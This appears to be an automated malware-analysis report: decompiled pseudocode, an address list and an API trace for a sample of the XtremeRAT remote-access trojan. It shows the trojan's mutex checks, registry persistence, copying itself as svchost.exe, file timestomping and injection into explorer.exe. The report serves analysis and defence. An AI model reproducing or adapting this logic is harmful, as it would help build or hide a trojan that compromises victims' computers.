				intOrPtr _t416;
				intOrPtr _t418;
				intOrPtr* _t422;
				intOrPtr _t426;
				intOrPtr* _t428;
				intOrPtr _t447;
				intOrPtr _t452;
				void* _t453;
				intOrPtr _t454;
				intOrPtr _t456;
				void* _t458;
				void* _t465;
				WCHAR* _t471;
				void* _t476;
				intOrPtr _t477;
				void* _t479;
				void* _t481;
				void* _t482;
				intOrPtr _t484;
				intOrPtr _t485;
				void* _t503;

				_t475 = __esi;
				_t336 = __ebx;
				_t481 = _t482;
				_push(__eax);
				_t484 = _t482 + 0xffffffffffffe7c0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v6212 = 0;
				_v6216 = 0;
				_v6208 = 0;
				_v6204 = 0;
				_v6200 = 0;
				_v24 = 0;
				E00C82504(0xc89af0);
				_push(_t481);
				_push(0xc8a62b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t484;
				E00C81618(0xc89b88);
				_t37 =  *0xc8b108; // 0xc8b018
				 *_t37 = 1;
				SetErrorMode(0x8007); // executed
				Sleep(0x64); // executed
				E00C81C90( &_v24, E00C83420(1, __ebx, __esi));
				_t391 =  *0xc8b0d4; // 0x0
				E00C81DBC(_v24, _t391);
				if(0 == 0) {
					ShellExecuteW(0, L"open", E00C83420(0, __ebx, _t475), 0, 0, 0);
					ExitProcess(0);
				}
				_t45 = E00C8263C(0, 0, L"XTREMEUPDATE"); // executed
				_t465 = _t45;
				_t46 = GetLastError();
				_t490 = _t46 - 0xb7;
				if(_t46 == 0xb7) {
					Sleep(0x1770);
				}
				CloseHandle(_t465);
				E00C8291C();
				E00C83FDC(0,  &_v6196);
				_t476 =  &_v6196;
				memcpy(0xc8e07c, _t476, 0x607 << 2);
				_t485 = _t484 + 0xc;
				_t468 = _t476 + 0xc0e;
				E00C82B90(0xc8e07c, _t336, L"CONFIG", 0x181c, _t476 + 0xc0e, _t476, _t490);
				SHDeleteKeyW(0x80000001, L"SOFTWARE\\XtremeRAT"); // executed
				_t337 = E00C833A8(E00C8310C(), L"\\Microsoft\\Windows\\", _t490);
				_t59 = E00C834C4(_t57);
				_t491 = _t59 - 1;
				if(_t59 != 1) {
					_t340 = E00C833A8(E00C833A8(E00C833A8(E00C8310C(), "\\", __eflags), 0xc8f38c, __eflags), L".cfg", __eflags);
				} else {
					_t340 = E00C833A8(E00C833A8(_t337, 0xc8f38c, _t491), L".cfg", _t491);
				}
				_t67 = E00C835B0(_t340);
				_t492 = _t67;
				if(_t67 != 0) {
					SetFileAttributesW(_t340, 0x80);
					 *0xc8f8a0 = E00C835DC(_t340, 0xc8f8a8);
					 *0xc8f8a4 = 0xc8f8a8;
					E00C83674(_t340);
					_t456 =  *0xc8f8a0; // 0x0
					_t314 =  *0xc8f8a8; // 0xc80000
					E00C82B90(_t314, _t340, L"CONFIG", _t456, _t468, _t476, _t492);
					E00C8291C();
					_t458 =  *0xc8f8a8; // 0xc80000
					E00C82914(0xc8e07c, _t458);
					if( *0xc8f690 != 0x1e240) {
						SetFileAttributesW(_t340, 0x80);
						DeleteFileW(_t340);
						E00C8291C();
						E00C83FDC(0,  &_v6196);
						_t476 =  &_v6196;
						memcpy(0xc8e07c, _t476, 0x607 << 2);
						_t485 = _t485 + 0xc;
						_t468 = _t476 + 0xc0e;
						E00C82B90(0xc8e07c, _t340, L"CONFIG", 0x181c, _t476 + 0xc0e, _t476, 0);
					}
				}
				SetFileAttributesW(_t340, 0x80); // executed
				DeleteFileW(_t340); // executed
				 *0xc8f8a8 = E00C81100(0x181c);
				_t72 =  *0xc8f8a8; // 0xc80000
				E00C82914(_t72, 0xc8e07c);
				_t74 =  *0xc8f8a8; // 0xc80000
				E00C82B90(_t74, _t340, L"CONFIG", 0x181c, _t468, _t476, 0);
				_t401 =  *0xc8f8a8; // 0xc80000
				E00C83218(_t340, _t401, 0x181c, 0); // executed
				E00C83674(_t340);
				_t80 = E00C8263C(0, 0, "DSma9HnKa"); // executed
				 *0xc8f8b0 = _t80;
				if(GetLastError() == 0xb7) {
					ExitProcess(0);
				}
				_t477 =  *0xc8f414; // 0x0
				if(_t477 <= 0) {
					L14:
					E00C81C90( &_v6200, _t340);
					E00C81D04(_v6200);
					E00C82914(0xc918fc, _t340);
					E00C89790(0xc8f8b4);
					_t405 = E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t497);
					E00C82F90(0x80000001, _t91, _t497, 2, "5/3/2018 10:11:44 AM"); // executed
					if( *0xc8f5bc == 1) {
						E00C88918(_t405, _t468, 0xc8fccc);
					}
					if( *0xc8f5c9 == 1) {
						_t306 = E00C89840();
						_t500 = _t306;
						if(_t306 == 0) {
							E00C898DC(0xc8e07c);
						}
					}
					GetModuleFileNameW(0, "svchost.exe", 0x20a);
					_t96 = E00C84914(0xc8fac0, _t340, 0xc8e07c, _t468, _t477); // executed
					_t341 = _t96;
					E00C84B88(_t96, 0xc8e07c);
					 *0xc8f898 = E00C833A8(_t96, 0xc8a704, _t500);
					_t501 =  *0xc8f2b1 - 1;
					if( *0xc8f2b1 == 1) {
						_t251 =  *0xc8f898; // 0xc30000
						SetFileAttributesW(_t251, 0x80); // executed
						_t253 =  *0xc8f898; // 0xc30000
						SetFileAttributesW(E00C836D8(_t253, _t501), 0x80); // executed
						E00C81248();
						_push(_t481);
						_push(0xc8a01f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t485;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_t274 = E00C812A4(6);
						_t275 =  *0xc8f898; // 0xc30000
						_pop(_t378); // executed
						E00C83BC4(_t275, _t341, _t378, _t274 + 0x7d1); // executed
						_pop(_t452);
						 *[fs:eax] = _t452;
						_push(_t481);
						_push(0xc8a09d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t485;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_push(E00C812A4(6) + 0x7d1);
						_t297 =  *0xc8f898; // 0xc30000
						_t298 = E00C836D8(_t297, _t501);
						_pop(_t453);
						_pop(_t381); // executed
						E00C83BC4(_t298, _t341, _t381, _t453); // executed
						_pop(_t454);
						 *[fs:eax] = _t454;
						_t301 =  *0xc8f898; // 0xc30000
						E00C83674(_t301);
						_t303 =  *0xc8f898; // 0xc30000
						E00C83674(E00C836D8(_t303, _t501));
					}
					_t101 =  *0xc8f898; // 0xc30000
					E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t501), _t501, 2, _t101); // executed
					memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
					_t471 = 0xc8ec8a;
					_t107 =  *0xc8f898; // 0xc30000
					E00C82E48(_t107);
					_t411 =  *0xc8f898; // 0xc30000
					E00C82914(0xc914e8, _t411);
					E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t501));
					E00C82914(0xc91b06, _t112);
					_t117 =  *0xc8f898; // 0xc30000
					_t343 = E00C836D8(_t117, _t501);
					E00C82E48(_t343);
					E00C82914(0xc916f2, _t343);
					if( *0xc8f38a == 1) {
						_t235 = E00C8263C(0, 0, "DSma9HnKaPERSIST"); // executed
						_t471 = _t235;
						_t503 = GetLastError() - 0xb7;
						if(_t503 == 0) {
							CloseHandle(_t471);
						} else {
							CloseHandle(_t471);
							 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t503);
							E00C8291C();
							_t243 =  *0xc8f89c; // 0x19a0000
							E00C82E48(_t243);
							_t447 =  *0xc8f89c; // 0x19a0000
							E00C82914(0xc8fac0, _t447);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t481);
							_t249 =  *0xc8f8ac; // 0x17c
							E00C83CE4(_t249, 0xc8fccc, E00C88EF8);
						}
					}
					E00C81CD8( &_v6204, 0x11, 0xc8f2b2);
					_t416 =  *0xc8b0dc; // 0x0
					E00C81DBC(_v6204, _t416);
					if(_t503 != 0) {
						E00C81CD8( &_v6208, 0x11, 0xc8f2b2);
						_t418 =  *0xc8b0d8; // 0x0
						E00C81DBC(_v6208, _t418);
						if(__eflags != 0) {
							 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
							_t133 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t133, 0xc91f1c, _t481);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								_t221 =  *0xc8f89c; // 0x19a0000
								_t222 = E00C83A54(_t221, 0xc8f8ac);
								__eflags = _t222;
								if(_t222 != 0) {
									_t223 =  *0xc8f8ac; // 0x17c
									 *0xc8f89c = E00C83B10(_t223);
								} else {
									 *0xc8f89c = E00C83094();
								}
								_t225 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t225, 0xc91f1c, _t481);
								__eflags =  *0xc8f8ac;
								if(__eflags == 0) {
									 *0xc8f89c = E00C83094();
									_t228 =  *0xc8f89c; // 0x19a0000
									 *0xc8f8ac = E00C83EA8(_t228, 0xc91f1c, _t481);
								}
							}
						} else {
							 *0xc8f89c = E00C83094();
							_t232 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t232, 0xc91f1c, _t481);
						}
					} else {
						 *0xc8f8ac = 0;
					}
					_t479 = 0;
					 *0xc8f8a8 = 0;
					_t504 =  *0xc8f2b0;
					if( *0xc8f2b0 != 0) {
						_t343 =  *0xc8f898; // 0xc30000
						_t471 = E00C833A8(E00C83420(0, _t343, 0), 0xc8a704, _t504);
						if(E00C83960(_t343, E00C82E48(_t343), _t471) == 0) {
							SetFileAttributesW(_t471, 0x80);
							_t506 = E00C82E48(_t471) + _t214;
							E00C82914(0xc91d10, _t471);
							E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t471) + _t214), 0xc91f1c, _t481), 0xc91d10, E00C897F4);
						}
					}
					_t138 = E00C833A8(E00C836D8(0xc918fc, _t506), 0xc90fdc, _t506);
					_t422 =  *0xc8b0f0; // 0xc8e01c
					 *_t422 = _t138;
					_t139 =  *0xc8b0f0; // 0xc8e01c
					_t141 = E00C833A8( *_t139, L".xtr", _t506);
					_t424 =  *0xc8b0f0; // 0xc8e01c
					 *_t424 = _t141;
					_t142 =  *0xc8b0f0; // 0xc8e01c
					if(E00C835B0( *_t142) != 0 && E00C87B84(L"local", _t343, _t479) == 1) {
						_t509 =  *0xc8f8ac;
						if( *0xc8f8ac == 0) {
							GetModuleFileNameW(0, "svchost.exe", 0x20a);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t481);
						}
						_t428 =  *0xc8b0e4; // 0xc8e024
						_t185 =  *0xc8b0e8; // 0xc8e020
						E00C82B90( *_t185, _t343, L"XTREME",  *_t428 - 0x1e, _t471, _t479, _t509);
						E00C82E14( &_v6216, L"XTREME", 0, GetCurrentProcessId(), 0);
						E00C81D10( &_v6212, _v6216, L"SOFTWARE\\", _t509);
						E00C82F90(0x80000001, E00C81CF4(_v6212), _t509, 2, "DSma9HnKa");
						_t197 =  *0xc8f8b0; // 0xd8
						CloseHandle(_t197);
						_t199 =  *0xc8b0e8; // 0xc8e020
						_t424 = 0;
						E00C84600( *_t199, 0xc8f8ac, 0, 0, 0xc91f1c);
						Sleep(0x3e8);
						ExitProcess(0);
					}
					_t511 =  *0xc8f8ac;
					if( *0xc8f8ac != 0) {
						_t145 =  *0xc8f8b0; // 0xd8
						CloseHandle(_t145);
						while(1) {
							_t425 = E00C88BC0;
							_t147 =  *0xc8f8ac; // 0x17c
							 *0xc8f8a8 = E00C83CE4(_t147, 0xc8fccc, E00C88BC0);
							Sleep(0x1f4); // executed
							__eflags =  *0xc8f8a8;
							if( *0xc8f8a8 == 0) {
								_t172 =  *0xc8b0e0; // 0xc8b000
								_t174 =  *0xc8f8ac; // 0x17c
								TerminateProcess(_t174,  *_t172);
								_t425 = 0xc91f1c;
								_t176 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t176, 0xc91f1c, _t481);
							}
							_t479 = _t479 + 1;
							_t149 = E00C8263C(0, 0, "DSma9HnKa"); // executed
							_t472 = _t149;
							_t150 = GetLastError();
							__eflags = _t150 - 0xb7;
							_t343 = _t343 & 0xffffff00 | _t150 == 0x000000b7;
							CloseHandle(_t149);
							__eflags = _t343;
							if(_t343 == 0) {
								_t166 =  *0xc8b0e0; // 0xc8b000
								_t168 =  *0xc8f8ac; // 0x17c
								TerminateProcess(_t168,  *_t166);
								_t425 = 0xc91f1c;
								_t170 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t170, 0xc91f1c, _t481);
							}
							__eflags = _t479 - 7;
							if(_t479 >= 7) {
								break;
							}
							__eflags = _t343 - 1;
							if(_t343 != 1) {
								continue;
							}
							break;
						}
						E00C840F8(0xc8e07c, _t343, _t425, _t472, _t479); // executed
						__eflags =  *0xc8f8a8;
						if(__eflags == 0) {
							_t161 =  *0xc8b0e0; // 0xc8b000
							_t163 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t163,  *_t161);
							E00C88BC0(_t343, _t472, _t479, __eflags, 0xc8fccc);
						}
						__eflags = _t479 - 7;
						if(_t479 >= 7) {
							__eflags = _t343;
							if(_t343 == 0) {
								_t159 =  *0xc8f898; // 0xc30000
								ShellExecuteW(0, L"open", _t159, 0, 0, 0);
							}
						}
						goto L59;
					} else {
						_t178 =  *0xc8f8b0; // 0xd8
						CloseHandle(_t178);
						E00C840F8(0xc8e07c, _t343, _t424, _t471, _t479);
						E00C88BC0(_t343, _t471, _t479, _t511, 0xc8fccc);
						L59:
						_pop(_t426);
						 *[fs:eax] = _t426;
						_push(0xc8a632);
						E00C81B90( &_v6216, 5);
						return E00C81B78( &_v24);
					}
				} else {
					do {
						Sleep(0x3e8);
						_t477 = _t477 - 1;
						_t497 = _t477;
					} while (_t477 > 0);
					goto L14;
				}
			}

0x00c89ba4
0x00c89ba4
0x00c89ba5
0x00c89bad
0x00c89bae
0x00c89bb4
0x00c89bb5
0x00c89bb6
0x00c89bb9
0x00c89bbf
0x00c89bc5
0x00c89bcb
0x00c89bd1
0x00c89bd7
0x00c89bdf
0x00c89be6
0x00c89be7
0x00c89bec
0x00c89bef
0x00c89bf7
0x00c89bfc
0x00c89c01
0x00c89c09
0x00c89c10
0x00c89c24
0x00c89c2c
0x00c89c32
0x00c89c37
0x00c89c4e
0x00c89c55
0x00c89c55
0x00c89c63
0x00c89c68
0x00c89c6a
0x00c89c6f
0x00c89c74
0x00c89c7b
0x00c89c7b
0x00c89c81
0x00c89c90
0x00c89c9d
0x00c89ca2
0x00c89cb2
0x00c89cb2
0x00c89cb2
0x00c89cc3
0x00c89cd2
0x00c89ce6
0x00c89cea
0x00c89cef
0x00c89cf1
0x00c89d3c
0x00c89cf3
0x00c89d0d
0x00c89d0d
0x00c89d40
0x00c89d45
0x00c89d47
0x00c89d53
0x00c89d64
0x00c89d6a
0x00c89d72
0x00c89d7c
0x00c89d82
0x00c89d87
0x00c89d96
0x00c89da5
0x00c89dab
0x00c89dba
0x00c89dc2
0x00c89dc8
0x00c89dd7
0x00c89de4
0x00c89de9
0x00c89df9
0x00c89df9
0x00c89df9
0x00c89e0a
0x00c89e0a
0x00c89dba
0x00c89e15
0x00c89e1b
0x00c89e2a
0x00c89e39
0x00c89e3e
0x00c89e4d
0x00c89e52
0x00c89e5e
0x00c89e66
0x00c89e6d
0x00c89e7b
0x00c89e80
0x00c89e8f
0x00c89e93
0x00c89e93
0x00c89e98
0x00c89ea0
0x00c89eb1
0x00c89eb9
0x00c89ec4
0x00c89ed4
0x00c89ede
0x00c89ef9
0x00c89f05
0x00c89f11
0x00c89f18
0x00c89f18
0x00c89f24
0x00c89f26
0x00c89f2b
0x00c89f2d
0x00c89f34
0x00c89f34
0x00c89f2d
0x00c89f45
0x00c89f54
0x00c89f59
0x00c89f62
0x00c89f73
0x00c89f78
0x00c89f7f
0x00c89f8a
0x00c89f90
0x00c89f9a
0x00c89fa5
0x00c89faa
0x00c89fb1
0x00c89fb2
0x00c89fb7
0x00c89fba
0x00c89fc8
0x00c89fd4
0x00c89fe0
0x00c89fec
0x00c89ff8
0x00c89ffe
0x00c8a00a
0x00c8a00f
0x00c8a010
0x00c8a017
0x00c8a01a
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a082
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a
0x00c89ea2
0x00c89ea2
0x00c89ea7
0x00c89eac
0x00c89ead
0x00c89ead
0x00000000
0x00c89ea2

APIs

Part of subcall function 00C82504: GetModuleHandleA.KERNEL32(00000000,?,00C89BE4), ref: 00C82510

SetErrorMode.KERNEL32(00008007,00000000,00C8A62B), ref: 00C89C09
Sleep.KERNEL32(00000064,00008007,00000000,00C8A62B), ref: 00C89C10

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C89C4E
ExitProcess.KERNEL32(00000000,00000064,00008007,00000000,00C8A62B), ref: 00C89C55

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C6A
Sleep.KERNEL32(00001770,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C7B
CloseHandle.KERNEL32(00000000), ref: 00C89C81

Part of subcall function 00C83FDC: FindResourceW.KERNEL32(00C80000,00000000,0000000A), ref: 00C83FF3
Part of subcall function 00C83FDC: SizeofResource.KERNEL32(00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84001
Part of subcall function 00C83FDC: LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C8400F
Part of subcall function 00C83FDC: LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84017
Part of subcall function 00C83FDC: FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C8402B

SHDeleteKeyW.SHLWAPI(80000001,SOFTWARE\XtremeRAT), ref: 00C89CD2

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89D53

Part of subcall function 00C835DC: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C83610
Part of subcall function 00C835DC: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8361F
Part of subcall function 00C835DC: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8363B
Part of subcall function 00C835DC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C83649
Part of subcall function 00C835DC: ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C8365A
Part of subcall function 00C835DC: CloseHandle.KERNEL32(00000000), ref: 00C83660

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC2
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC8
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E15
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E1B

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00C80000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E85
ExitProcess.KERNEL32(00000000,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E93
Sleep.KERNEL32(000003E8,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89EA7

Part of subcall function 00C89790: GetLocalTime.KERNEL32 ref: 00C89797
Part of subcall function 00C89790: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,5/3/2018 10:11:44 AM,000000FF), ref: 00C897B0
Part of subcall function 00C89790: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C897E0

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE), ref: 00C89F45

Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
Part of subcall function 00C84914: CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84A8F
Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11
Part of subcall function 00C84914: CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84B27

SetFileAttributesW.KERNEL32(00C30000,00000080,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C89F90
SetFileAttributesW.KERNEL32(00000000,00000080,00C30000,00000080,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C89FA5

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

